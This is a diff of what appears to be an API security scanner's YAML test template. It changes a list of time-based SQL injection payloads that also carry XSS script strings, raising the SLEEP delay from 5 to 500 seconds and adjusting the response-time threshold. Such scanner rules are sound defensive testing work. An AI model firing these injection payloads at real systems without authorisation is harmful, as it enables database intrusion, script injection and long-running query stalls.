@@ -76,12 +76,12 @@ api_selection_filters:
7676 extract : userVal
7777wordLists :
7878 timeBasedPayloads :
79- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<script>alert(\" XSS\" );</script>' --"
80- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<svg/onload=alert(\" XSS\" )>') --"
81- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<img src=\" x\" onerror=\" alert('XSS')\" > --"
82- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<script>alert(\" XSS\" );</script>') --"
83- - " ' AND IF(1=1, SLEEP(5 ), 0) UNION SELECT null,'<svg/onload=alert(\" XSS\" )>' --"
84- - " ' OR IF(1=1, SLEEP(5 ), 0) UNION SELECT null,concat('<img src=\" x\" onerror=\" alert('XSS')\" >') --"
79+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<script>alert(\" XSS\" );</script>' --"
80+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<svg/onload=alert(\" XSS\" )>') --"
81+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<img src=\" x\" onerror=\" alert('XSS')\" > --"
82+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<script>alert(\" XSS\" );</script>') --"
83+ - " ' AND IF(1=1, SLEEP(500 ), 0) UNION SELECT null,'<svg/onload=alert(\" XSS\" )>' --"
84+ - " ' OR IF(1=1, SLEEP(500 ), 0) UNION SELECT null,concat('<img src=\" x\" onerror=\" alert('XSS')\" >') --"
8585execute :
8686 type : multiple
8787 requests :
@@ -139,7 +139,7 @@ validate:
139139 and :
140140 - compare_greater :
141141 - ${x2.response.stats.median_response_time}
142- - 5001
142+ - 15001
143143 - compare_greater :
144144 - ${x2.response.stats.median_response_time}
145145 - ${x1.response.stats.median_response_time} * 5
0 commit comments